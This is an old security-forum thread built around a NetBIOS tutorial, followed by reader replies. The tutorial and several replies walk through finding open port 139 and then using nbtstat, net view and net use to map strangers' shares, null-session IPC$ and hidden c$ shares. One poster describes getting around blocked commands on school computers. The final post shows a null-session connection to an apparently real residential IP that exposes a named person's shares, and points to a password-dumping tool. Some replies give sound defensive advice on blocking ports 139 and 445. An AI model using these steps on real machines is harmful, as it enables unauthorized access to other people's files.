NetBIOS Tutorial by RiOtEr

NetBIOS stands for Network basic input output system and is used in Windows for its file and printer sharing.

1. NetBIOS

To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:

25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn

If your results look like that then you're set...

2. nbtstat

To get the info you need for the attack we use a program called nbtstat:

Open up your console in WinXP, or a DOS-prompt in earlier windows-versions.

c:\>nbtstat -A 127.0.0.1

Use -A if you're using IP addresses. If you're going to use hostnames use -a.

This will give you what is called a nametable:


Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
computername <00> UNIQUE Registered
workgroupname <00> GROUP Registered
computername <20> UNIQUE Registered
workgroupname <1E> GROUP Registered
workgroupname <1D> UNIQUE Registered
..__MSBROWSE__. <01> GROUP Registered

MAC Address = xx-xx-xx-xx-xx-xx


This is a friend's nametable (names and workgroups have been edited to save him from elite_hax0rs)

Now, the line
computername <20> UNIQUE Registered
is the interesting one as <20> means that filesharing is enabled: that means we can try to connect to that computer.
First, we need to know their harddrive names etc, and we need to see if it's xp and if they have SharedDocs. To do this we use net view \\ipaddress

C:\>net view \\127.0.0.1
Shared resources at \\xxx.xxx.xxx.xxx
Share name Type Used as Comment

-----------------------------------
SharedDocs Disk
The command completed successfully.

That's the result you should get (it wil be different on a non-WinXP box ).

Now comes the interesting part: we want to use and browse the person's harddrive just like it was locally. For doing that, we use a program called net use
net use letter: \\ipaddress\name

c:\>net use g: \\127.0.0.1\SharedDocs
The command completed successfully.
c:\>net use h: \\127.0.0.1\C
The command completed successfully.

Now their harddrive is "mirrored" to the drive letter we specifided (so make sure its not a drive that exists on your computer). Now just browse it as you would a local drive:

c:\>cd g:
g:\>

In windows XP (not sure about other windows) you can open up "my computer": the drive you just added will be there for you to browse in all the GUI goodness.
When you're done, make sure you remove the shared drive from your machine:

c:\>net use /delete g:
g: was deleted successfully.

Some systems may be locked with passwords (win2k, WinNT):
If you know the password, you would use this command:

net use password \\ip\sharename (not sure about that one...)

Now, many people will be saying "this is a security site, why are you telling us this?". The reason is simple: I'm showing you how easy it is for your windows machine to be hacked withough proper protection... Moral of this story: always cover port 139.

RiOtEr

great post Rioter.

Thank yah!

fl00t!

Good post, I learned something!

<quote>Moral of this story: always cover port 139.</quote>

True, but Win2000 and WinXP also listen on port 445 for SMB service directly over TCP. port 139 is like "smb over netbios over tcp" (sortof)...

Moral of this follow up: if you run w2k or wXP, always cover port 139 AND 445

Ammo

So when you port scan a system and netbios services are open you can just use net to connect and rummange through their directories?

Sometimes...

Depends if there are actually drives shared, and depends on if passwords are set.

Ammo

very good, expect some green, amn best tut ive ever read.

preep

um... ur all probably gunna tell me i have stupid questions but at least i might be safe if its answered, if u have a firewall doesnt it protect all ports?

One's that you specify it to protect, yeah.

Leave it to m$ to build a Trojan into the OS. Blocking the netbios ports is a good start but I like to go a step further and uninstall netbios all together.

A how to on removing netbios
http://www.techsupportalert.com/search/t1720.pdf

http://packetstorm.dnsi.info/NT/docs/null.sessions.html :D

To connect to Windows NT/2k share:

c:\>net use \\victim_ip\ipc$ password /user:username

c:\>net view \\victim_ip

c:\>net use * \\victim_ip\share

i thought giving that this is a security site i didnt really cover how to stop such attacks well if you dont need file/printer sharing then turn it off that will stop the majority off atacks but if you do need it download a firewall and make sure you block any incoming connections to port 139 445 as ammo pointed out because you probably need it but if you do limit the ips that can connect to it ie trusted ips
hope thats a bit of help
RiOtEr

this is just a command-line way of mapping a drive!!nothing new!!!

this is just a command-line way of mapping a drive!!nothing new!!!

Show us something new then ;).

Good job!

By far the best tutorial i have read since november.

Thanks for answering a question before i could ask it:)

this is just the same as mapping a drive...youre just using the command line!!!nothing new!!!

/me tries hard not to flame but im in a shitty mood

it may not be new for you sorry mr elite hacker ill write tutorials on only topics that you know and forget 70% of this board that ok for you...?
so here it goes a tutorial of your kind
how to leave people alone
1. see the little red button with a cross through it click it
2. see that little start menu (cuase someone as elite as you would only be using the lunix) click it
3.see shutdown computer button click that as well
4. see that computer thing take it and give it to your mum cause she can put it to better use
5. see that elitist attitude well special.php is the only solution for it
RiOtEr

cool

i haven't qiute understand but i guess it's nice who now's i might need it someday good job rioter

Great info!

I read the attached .pdf file, and have disabled netbios on my W2K box, but I am wondering, should I remove the netbios.dll file too? I didn't see anymore info on it.

That depends on many things. Bottom line: Check your firewall configs to be sure that it is blocking everything that you need blocked. Best practice is to operate on the least privilage model. (only allow what is specifically needed, otherwise, block it)

Good tutuorial! Taught me more about 'computer defense'.

Excellent tut!! Ri0tEr,

This helps me alot to secure my box I never new that such a thing was possible!

Jock, deleting that file won't do anything about protecting your NetBIOS.....

As long as it's disabled/masked by the firewall and that you disable file and printer sharing, your OK.

Well its a great tutorial. But it not working for me i guess.

I am getting this problem that whenever I type
net use p: \\ip\C

the dos tells me System error 53 has occured. Network path was not found.

Any idea why is it happening!!!!!

thanks in advance.

Best Regards.

the dos tells me System error 53 has occured. Network path was not found.

I get that error when I try to connect to a box that doesn't have file/print share enabled, or that particular share isn't there. I can't remember which one at the moment.

FYI- The default share for 2k is c$ which means its hidden

you would use

net use p: \\ip\c$

to connect to that one.

Thanks.........dat really worked.

Once again thanks a lot. I really appreciate that.

Best regards.

Another question!!!

Now it is giving me system error 85 has occured.

The local drive name is already in use.

any idea why is it happening.

thanks.

BTW I am connecting to another pc which I own and experimenting with it. I thought that it will be helpful in telling that.

Best regards.

Good tut, and as a side note this is one of the most useful tools Microsoft has given the sysadmin. With netbios, hidden shares, and the NFS commands (net use ext.) we can have active shares to deal with centralized installation files with the user never knowing they are there. This is in no way a cracker tool with no legitimate use.

Now it is giving me system error 85 has occured.

The local drive name is already in use.

any idea why is it happening

You are too funny... :confused:

if you used drive p to connect, then it is still connected until you use

net use p: /delete

you can't assign 2 shares to the same drive letter.

to find out what ones you are currently useing...

net use

Oh I am sorry. I did figure it out before your reply. I will try to be careful in the future.

Bot pc have WIN XP.


Now the command is working on my own pc but when i try to do the same to gain the access of the second pc it gives me an option that system error 5 has occured. And insert the username guest for that pc and then the password.

First of all that pc have no guest login and only one login specified and i know the password for that. But it keeps on telling me that access denied.

I like to know is that should i make a guest login on that screen and can access it with the password provided there.


Do forgive me for some of my silly posts. I understand how fed up ones become on some questions but I am a newbie and will try t be careful in the future.


Thanks.

Best Regards,

tja , i saw other lections about hacking under NetBios, thisone is good, but if some1 wanna read another1: www.hackerthreads.com -> hacking under NetBios ( with examples) ist good too! :> enjoy!

Knowledge is power!!!

its www.hackerthreads.org instead of www.hackerthreads.com . Just a minor mistake.

I have a question that does net use command works if we try to access other than shared resources on another computer. I have came to know that XP is the most powerful OS of MS and it is very good security wise. So does net use command of DOS works on XP or not.

Thanks

Best Regards.

dodgiest tut on netbios I've ever seen

I have a question that does net use command works if we try to access other than shared resources on another computer. I have came to know that XP is the most powerful OS of MS and it is very good security wise. So does net use command of DOS works on XP or not.
The tutorial was written with XP in mind, so you'll have no troubles there. And you can't access non-shared resources over netbios using these techniques. But if you can install a backdoor with your shared recource access, then you can get to the whole computer in the end anyway.

Hey I got a question, [Win ME]
Well I was doing this opened up MS-DOS prompt then typed in nbtstat -a 127.0.0.1 and it started but then it said host not found, i was wondering why it says that and i Tried doing it with my friends ip but said the same thing. Now what do i do.\

>Thanks, this was a very great thread.

Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=#post) by powertoad5000

The tutorial was written with XP in mind, so you'll have no troubles there. And you can't access non-shared resources over netbios using these techniques. But if you can install a backdoor with your shared recource access, then you can get to the whole computer in the end anyway.


I have a fair bit of idea using backdoors but I just am curious that is DOS that powerful that you can have access to another pc's hard drive even if it is not shared.

So far I think that XP is the most powerful OS made by MS, security wise. Althought I have no idea about the other OS's of MS in this particular matter but XP is not letting me get through it, which is in a way good thing so that from now on I should always go for XP on my LAN pcs.

Killerboots use a -A instead of -a
case is important in this instance.

ps The loopback address 127.0.0.1 doesn't seem to work in 2k either, try the IP address of your Network card / Modem if dialed in (get these using ipconfig at the command line)

Ur Daddy, I am not sure if this is what you are asking but there are default
shares of c$, d$ etc for each drive under win2k at least. So block that port!

I had already tried that but still comes up with the same answer "Host not found".

Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=#post) by kilerboots
I had already tried that but still comes up with the same answer "Host not found".


Yes, same is the case with XP. Try doing this with your ip instead of 127.0.0.1 and you'll get the desired results.

Oh ok I got it working and thanks everyone for the help.

Thanks for great post

Note that this doesn't work in some Exchange-run terminals? I have actually tried this at my school and found that this was blocked by Exchange 2000 server.

I mean, our school teachers and their affiliates are pretty dumb, when it comes to securing school computers. But this time the software version seems to work perfectly, in unification with the Windows 2000.

It was interesting to get through blocked command usage, but with help of the *.bat files, it was successful. Upto assigning a drive-map.

However, it failed to assign a drive-map without a notice. In the cmd.exe it actually stated that "net use command was successful".

Any idea how to bypass that?

I'm relatively annoyed -- please be patient with my lack of insight here, but I'm extremely new to this.

I keep using the command "nbtstat -A [IP address]" to get a table on hosts which I know have netbios shared resources avaliable, but nothing comes up. Instead, I seem to be getting the same thing for every attempt at this:

Lana # 0:
Node IpAddress: [67.13.241.161] Scope Id: []

Host not found.

Lana # 1:
Node IpAddress: [67.13.241.87] Scope Id: []

Host not found.

Lana # 2:
Node IpAddress: [172.147.10.119] Scope Id: []

Host not found.

I have concluded that the fact that I keep getting those three IP adresses for every target I try indicate that it is a problem based around my ISP -- compuserve. *Dodges flying objects*
Is this the reason I'm not getting any connection tables using nbtstat in the DOS prompt?

The other possibility I've thought of is that I'm using Windows ME, which I'm generally aware of being the suckiest operating system ever conceived of, and I think that this might hinder my ability to get this to work.

I'm sorry if this is incoherent, but as I said I'm fairly new to the game, so any help would be appreciated. Thanks. :)

Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=#post) by ammo
<quote>Moral of this story: always cover port 139.</quote>

True, but Win2000 and WinXP also listen on port 445 for SMB service directly over TCP. port 139 is like "smb over netbios over tcp" (sortof)...

Moral of this follow up: if you run w2k or wXP, always cover port 139 AND 445

Ammo

yup... no need to search for smtp / pop3 just port 139 / 445
usually 139 is enough

Has anyone ever printed out to the remote computers printer that they need to put up a firewall?
That would be funny to print something on their computer. Is this illegal to do? It seems like it would be.
One more question, can you run programs from the remote comps program files directory or will they not work because you have to have the dll's and stuff locally?
Thanks for the tut.

No you couldn`t directly run programs on their computer because netbios is a file sharing protocol. Not taking into account trojans and the like the only proper ways to run programs on other computers is through telnet and terminal services.
I`m guessing you could print on their computer but they would have to have it set up for file and print sharing.
And yes it would be illegal, it dosn`t matter what your doing, if your accessing some one else`s computer that you do not have permisson for your brakeing the law

RuffRyder........ thats funny

rofl
:)

yeah great post but I don't suppose this applies to me as I have changed over to LINUX and obviously for good reason

P.S. how much would a firewall help prevent this

if the firewall blocked port 139(which it should by default) then it will help a great deal because basically access to that port is only allowed locally, and most firewalls have a trusted zone to put comps on your network into so you can allow them to access that port while not allowing remote machines.

Firewalls usualy block all ports but if your running on a network, the admin mite be set up to allow connections to that port(s)

Your firewall can help quite a bit in solving many of the problems. You do however need to learn to properly configure it to allow you access to everything you need while blocking access to everyone else when attempting to connect to your box.

good tips post for the newbies like me thankz a lot

wow! So thats how those lil buggers were doing it! lol Thanks for the info... if this prog can be used for these resasons, why is it included in windows???

how do i block ports? I want to block port 139 but i dont know how to. I dont have a firewall but a router. I'm using XP Pro. whenever i check nestat -a -n ...i see that port 139 is in the state of Listening

Thanks,
bomber

I dont have a firewall but a router.
does your router have a firewall, because if it does then port 139 should already be blocked.
Also, are you on a network, because the router firewall won't block ports within the network. If you are not on a network, I recommend that you uninstall netbios, here is a link from within the thread

http://www.techsupportalert.com/search/t1720.pdf

good luck.

If you have a router, and using port address translation (Many to One), you should be protected from this. With this, there is no translation built for this port, so an incoming connection has no way of getting there.

If you have a firewall....you should also be protected, because if the firewall is doing what it should be doing. If a connection attempt is made and the connection wasn't initiated from the inside, then it shouldn't let that traffic pass through.

If you have static address translations, or have your computer is directly connected to your cable modem or you have opened up the 'evil' ports, well then....all bets are off.

Obvisouly different vendors equipment will have different options, but these are standard options among most routers/firewalls.

laters.


**EDIT**
If you're inside the network, then either put another firewall between you and the lan or run something like BlackICE or another host-based IDS application.

hmm, nbstat is unrecognized on my comp...

That's probably a good thing. I think all that means is that you don't have NetBIOS installed. That is good security wise. Just be thankful. You should be able to find something on here or at google if you want to turn it on. Try right-clicking on network neighborhood or my network places and selecting properties. If you do turn it on make sure you have a good firewall configured correctly.

does that mean noone can use that against me?
if so, i think i'll leave it off, its my good comp

I'm pretty sure that it does. Even so you still want to have a firewall and antivirus sofware.
firewall: http://soho.sygate.com/buy/download_buy.htm
The one at the bottom there is free.
Antivirus: http://www.grisoft.com/us/us_dwnl_free.php
Be safe.

ive got antivirus and a fire wall, and a firewall with my router

Sounds like you're in good shape. Just watch your computer and make sure nothing funny ever happens on it such as folders popping up that weren't there before, and the harddrive light blinking for more than a few seconds when the computer is doing nothing. If you have a firewall it is probably safe to turn netBIOS on so you can learn about the stuff in this tutorial. Just make sure the firewall blocks port 139. You should be able find info on netBIOS from google.

ok but... ive got a few games, Warcraft 3, Americas army, and to play those i turned on port forwarding with my router, am i still safe??
btw is black ice a good firewall?

When you say you turned on port forwarding, I'm going to assume you only forward the requests for the port used by the game and no others. In that case you are fairly safe. I say fairly, because, no matter what you do, if someone has the determination and the skill, you will get owned. But I wouldn't worry too much. Sounds like you are doing a lot of the right things. As for Black Ice, I've never used it, but most firewalls will do the job just fine as long as they are configured properly.

edit
If you have any more questions just PM me since this already seems to be a one on one discussion. If I can't help you, and google and the forum search can't help you, then post it here or some other related thread, or just make a new thread and I'm sure someone will be able to help you.

Yes netbios is a really interesting thing and really easy to use.I really liked to congratulate the tutorial and the detailed way you explained,since many people are trying and probably accessing hard drives and shares because of what you wrote.You should had wrote too the ways to protect like establishing password,use firewall to close the ports 137,138,139,and disable the file and printer sharing.You should say that this kind of access is not very stealth and can get you in trouble.you could have mentioned too that alot of smart people shares camouflaged trojans under other file formats besides exec and that these appear many times as a desirable information like passwords and account informations.You could probably have said that this is a good way to people who access this way to see their systems permanently destroyed.Its easy and sometimes very fun to use the netbios/nbtstat to check some boxes but don´t forget the people that see in this the possibility to infect others.i have seen this happening many times.Some animal fakes death,the vultures come near to feed and end to be food.

just check out google or yahoo for a prog named r3x.for the netbios access lovers.

Hey cwk9 do u play Battle.net? if so Find me on Necro)Rage@Azeroth

This is my first post on AO, but I just wanted to say thank you for the tutorial. The information was well laid out and very helpful.

This should give you some answers :)
http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q137/5/65.asp&NoWebContent=1

from where u ppl get all this stuff
its very interesting to learn all this

C:\&gt;nslookup 24.49.32.1
Server: nscache2.chvlva.adelphia.net
Address: 24.51.159.133

Name: va-frontroyal1a-gate.chvlva.adelphia.net
Address: 24.49.32.1


C:\&gt;Net use //24.49.32.1/ipc$ /user: ""
The command completed succesfully.

C:\&gt;net use G: //24.49.32.1/ipc$ /user: ""
The command completed succesfully.

C:\&gt;net view //24.49.32.1

Carol Hoopes

Share name Type Used as Comment

-----------------------------------------------------------------
Printer Print Lexmark X74-X75
SharedDocs Disk
The command completed successfully.

C:\&gt;G:
G:\&gt;Net use //24.49.32.1 /delete
The command completed successfully.

NOTE: here is to give you a little better idea of what you can do .... also you can go to www.l0pht.com and download NBTDUMP.EXE it is a VERY nice program for getting netbios shares and passwords it's a dos program and it writes the results in a nice clean HTML file.